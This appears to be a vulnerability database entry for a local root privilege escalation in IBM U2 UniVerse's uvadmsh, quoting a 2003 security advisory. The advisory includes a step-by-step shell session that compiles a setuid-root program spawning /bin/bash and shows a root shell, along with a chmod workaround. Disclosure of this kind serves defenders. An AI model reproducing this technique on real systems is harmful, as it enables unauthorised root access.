Published: 2003-08-18 00:00:00
Revised: 2016-10-17 22:35:31

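[Original] Buffer overflow in uvadmsh in IBM U2 UniVerse and earlier allows the uvadm user to execute arbitrary code via a long -uv.install command line argument.

[CNNVD] IBM U2 UniVerse arbitrary code execution vulnerability (CNNVD-200308-101)

        uvadmsh in IBM U2 UniVerse and earlier versions contains a buffer overflow vulnerability. The uvadm user can execute arbitrary code via an overly long -uv.install command line argument.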

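- CVSS (base score)

CVSS score: 7.2 [Severe (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may bring the system down entirely]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]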

- CPE (affected platforms and products)


- OVAL (technical details for detection)


- Official database links
(Official data source) MITRE
(Official data source) NVD
(Official data source) CNNVD

- Other links and resources
(VENDOR_ADVISORY)  VULNWATCH  20030716 SRT2003-07-08-1223 - IBM U2 UniVerse uvadm can take root via buffer overflows
(UNKNOWN)  BUGTRAQ  20030716 SRT2003-07-08-1223 - IBM U2 UniVerse uvadm can take root via buffer overflows

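- Vulnerability information

IBM U2 UniVerse arbitrary code execution vulnerability
High risk  Buffer overflow
2003-08-18 00:00:00 2005-10-20 00:00:00
        uvadmsh in IBM U2 UniVerse and earlier versions contains a buffer overflow vulnerability. The uvadm user can execute arbitrary code via an overly long -uv.install command line argument.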

- Advisories and patches


- Vulnerability information

IBM U2 UniVerse uvadmsh Overflow
Input Manipulation
Loss of Integrity

- Vulnerability description

Thanks to IBM for being so receptive with these issues. For those of you that have requested we revive the old "Snosoft" advisories we have begun placing our legacy advisories at as time permits.

-KF

Secure Network Operations, Inc.
Strategic Reconnaissance Team
Team Lead Contact

Our Mission:
************************************************************************
Secure Network Operations offers expertise in Networking, Intrusion Detection Systems (IDS), Software Security Validation, and Corporate/Private Network Security. Our mission is to facilitate a secure and reliable Internet and inter-enterprise communications infrastructure through the products and services we offer.

Quick Summary:
************************************************************************
Advisory Number     : SRT2003-07-07-0833
Product             : IBM U2 UniVerse
Version             : Version <= ?
Vendor              :
Class               : local
Criticality         : High (to UniVerse servers with local users)
Operating System(s) : Only confirmed on Linux (other unix based?)

High Level Explanation
************************************************************************
High Level Description : users with uvadm rights can take root
What to do             : chmod -s /usr/ibm/uv/bin/uvadmsh

Technical Details
************************************************************************
Proof Of Concept Status : SNO Does have PoC code for this issue.
Low Level Description   :

UniVerse is an extended relational database designed for embedding in vertical applications. Its nested relational data model results in intuitive data modeling and fewer resulting tables. UniVerse provides data access, storage and management capabilities across Microsoft(r) Windows(r) NT, Linux and UNIplatform.

The creation and use of the Unix user 'uvadm' is optional for UniVerse. It is not required for the successful installation, configuration and administration of UniVerse. The intended use of uvadm is to allow a selected, specific non-root user to perform all aspects of UniVerse administration.

The uvadmsh program checks the user's name against the string "uvadm" which means in order to exploit this issue you need to have access to the user uvadm.

    [kf@vegeta kf]$ ltrace /tmp/uvadmsh -uv.install /tmp
    ...
    strcmp("kf", "uvadm") = -1

    [uvadm@vegeta uvadm]$ id
    uid=503(uvadm) gid=503(uvadm) groups=503(uvadm)

You will note that with the proper uid the binary begins looking for the command line option "-uv.install" which is the path to a binary file to execute.

    [uvadm@vegeta uvadm]$ ltrace /tmp/uvadmsh -uv.install /tmp
    ...
    strcmp("uvadm", "uvadm") = 0
    strcmp("-uv.install", "-uv.install") = 0

This condition is fairly easy to take advantage of as you can see here.

    [uvadm@vegeta uvadm]$ cat > /tmp/uv.install.c
    main()
    {
    setuid(0);
    system("cc -o /tmp/owned /tmp/owned.c");
    system("chmod 4755 /tmp/owned");
    }
    [uvadm@vegeta uvadm]$ cc -o /tmp/uv.install /tmp/uv.install.c
    [uvadm@vegeta uvadm]$ cat > /tmp/owned.c
    main()
    {
    setuid(0);
    system("/bin/bash");
    }
    [uvadm@vegeta uvadm]$ ls -al /tmp/owned
    ls: /tmp/owned: No such file or directory
    [uvadm@vegeta uvadm]$ /usr/ibm/uv/bin/uvadmsh -uv.install /tmp
    [uvadm@vegeta uvadm]$ ls -al /tmp/owned
    -rwsr-xr-x 1 root uvadm 11640 Jul 2 20:15 /tmp/owned
    [uvadm@vegeta uvadm]$ /tmp/owned
    [root@vegeta uvadm]# id
    uid=0(root) gid=503(uvadm) groups=503(uvadm)

Patch or Workaround : chmod -s /usr/ibm/uv/bin/uvadmsh

Note: If you decide to 'chmod -s uvadmsh', you will need to be a root user to perform all of the uvadmsh functions.

Vendor Status : The IBM U2 staff will have this issue resolved in a future release of IBM U2. Patches may also be supplied on a per client basis at IBM's discretion.

Bugtraq URL : to be assigned

------------------------------------------------------------------------
This advisory was released by Secure Network Operations, Inc. as a matter of notification to help administrators protect their networks against the described vulnerability. Exploit source code is no longer released in our advisories. Contact for information on how to obtain exploit information.

- Timeline

2003-07-15 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete